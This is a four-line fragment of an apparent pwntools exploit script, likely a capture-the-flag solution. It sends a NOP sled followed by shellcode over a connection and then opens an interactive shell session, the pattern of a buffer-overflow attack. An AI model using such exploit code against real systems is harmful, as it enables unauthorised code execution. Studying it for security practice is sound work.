payload = b"\x90" * 0x34 + shellcode
#pause()
r.sendline(payload)
r.interactive()